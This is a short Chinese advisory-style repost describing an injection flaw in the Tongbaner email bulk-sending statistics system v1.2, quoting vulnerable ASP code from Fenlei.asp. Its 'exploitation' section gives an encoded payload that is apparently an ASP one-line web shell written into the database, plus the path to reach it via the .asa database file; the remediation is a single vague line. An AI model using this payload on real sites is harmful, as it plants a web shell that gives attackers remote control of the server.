铜板儿网邮件群发统计系统v1.2漏洞及修复

铜板儿网邮件群发统计系统v1.2漏洞及修复 - 网站

来源：自学PHP网时间：2015-04-17 14:47 作者：阅读:次

[导读] # Team:makebugs # Author: 缘分#39;Fenlei.asp IF Request.QueryString(Action)=del Then ID=Request.QueryString(ID) IF Countss (tui,Fenlei,ID )0 then #39;略 IF Request.Qu......

# Team:makebugs # Author: 缘分

'Fenlei.asp
      IF Request.QueryString("Action")="del" Then
      ID=Request.QueryString("ID")
      IF Countss ("tui","Fenlei",ID )<>0 then
    '略
      IF Request.QueryString("Action")="Add" Then
      Tname=Request.Form("Typename")
      Set Rs=Server.CreateObject("adodb.Recordset")
             Sql="Select * From Fenlei Order by id Desc "
             Rs.Open Sql,Conn,1,3
             Rs.Addnew
             Rs("Typename")=Tname
        '略
      Set Rs=Server.CreateObject("adodb.Recordset")
             Sql="Select * From Fenlei Order by id Desc "
             Rs.Open Sql,Conn,1,1
            '略
          %>

没有过滤，直接写入数据库。

利用方法：

插入：┼攠數畣整爠煥敵瑳∨≡┩>

连接： http://127.0.0.1/###tongbaner.asa
'默认安装文件：
'install.asp

http://t.qq.com/MakeBug

修复：过滤恶意输入

5w五维网址导航v8.0漏洞及修复 - 网站安全 - 自学

DEDECMS全版本gotopage变量XSS ROOTKIT 0DAY及修复 - 网站

子栏目

铜板儿网邮件群发统计系统v1.2漏洞及修复 - 网站

最新评论

添加评论

更多文章推荐

添加评论